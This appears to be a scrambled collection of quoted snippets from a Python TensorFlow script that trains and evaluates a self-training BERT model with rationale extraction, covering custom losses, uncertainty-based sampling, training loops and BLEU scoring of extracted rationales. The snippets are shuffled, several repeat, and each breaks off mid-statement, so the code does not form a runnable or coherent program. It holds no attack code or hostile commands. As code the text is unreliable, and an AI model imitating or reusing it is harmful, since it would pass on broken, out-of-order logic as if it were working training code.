model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev,", "strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true,", "return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32,", "model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter,", "tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from", "fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level:", "X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\":", "axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:,", "test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_:", "test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set", "= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student =", "custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus))", "y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class", "y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score", "0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0],", "'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]),", "\"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1)", "type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights =", "axis=0) if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if", "'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] =", "overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i", "{\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\":", "{}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var,", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in", "word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct", "task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for run", "test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': #", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat =", "range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0],", "loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0],", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0,", "(\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train,", "in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\":", "= np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task", "= {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev", "elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with", "#model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus,", "in type_: acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp'", "sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch):", "restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred)", "kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random from", "in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j", "= task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0],", "logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher", "= np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0],", "{\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None]", "#re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] =", "adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle", "in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))],", "''' if 'mtl' in type_: logger.info (\"Best validation acc for base model {}:", "''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "file loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred =", "\"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if '_neg'", "import logging import math import models import numpy as np import os, sys", "'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs,", "'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices],", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir,", "elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))])", "model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class", "y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1", "model): {} \".format(score4/len(pred))) best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])):", "\"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\":", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with", "loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred =", "= model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1)", "axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token", "= np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc", "set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student", "r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1)", "\".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model): {} \".format(score4/len(pred))) data", "file loaded from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0],", "y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]}", "0.0] else: loss_weights = [0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#,", "unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i,", "in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape:", "model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i])", "model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model): {}", "y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1", "range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in", "y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]),", "+= y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if", "= task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))],", "{}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch", "y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else:", "model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model): {}", "y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best)", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids =", "\"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0]", "model logger.info (\"Model file loaded from {}\".format(model_file)) break elif 'mtl' in type_ :", "np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print", "'_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc,", "X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape,", "= 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0", "1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and", "return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc,", "elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0],", "y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0],", "acc (token) {}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc))", "X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch", "from {}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True,", "tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]),", "\"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\":", "in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights", "for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run", "type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size],", "{}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model", "precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch", "(task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc", "predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices", "out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4],", "y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter,", "range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in", "with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = [1.0, 1.0,", "logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "validation loss best_base_model = None best_validation_loss = np.inf for counter in range(N_base): #original", "X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev =", "0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce =", "#.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64)", "def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384,", "type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs,", "tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i] temp['pred'] =", "y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test", "as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import random", "y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5,", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels),", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info", "model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred,", "#X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights", "_placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0],", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without rationales\")", "np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight)", "logger.info(\"BLEU-2 score of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score", "test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set", "logger.info(\"BLEU-4 score of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss =", "= X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape,", "in type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val", "= np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch", "np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred, r_acc =", "logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res", "y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]])", "of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales", "dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_:", "from transformers import * import logging import math import models import numpy as", "= out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test,", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or", "out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred,", "{} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student model): {} \".format(score2/len(pred)))", "on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test", "max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape:", "in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape)", "if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in", "{}\".format(labels)) #split X and y to train and dev with valid_split if valid_split", "X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else:", "X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf',", "score of rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf", "= out[3], out[4], out[5] logger.info (\"Test token acc for run {} : {}\".format(counter,", "1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0],", "y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [],", "X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\":", "#indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "(epoch + 1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1)", "= ' '.join(text) temp['truth'] = truth[i] temp['pred'] = 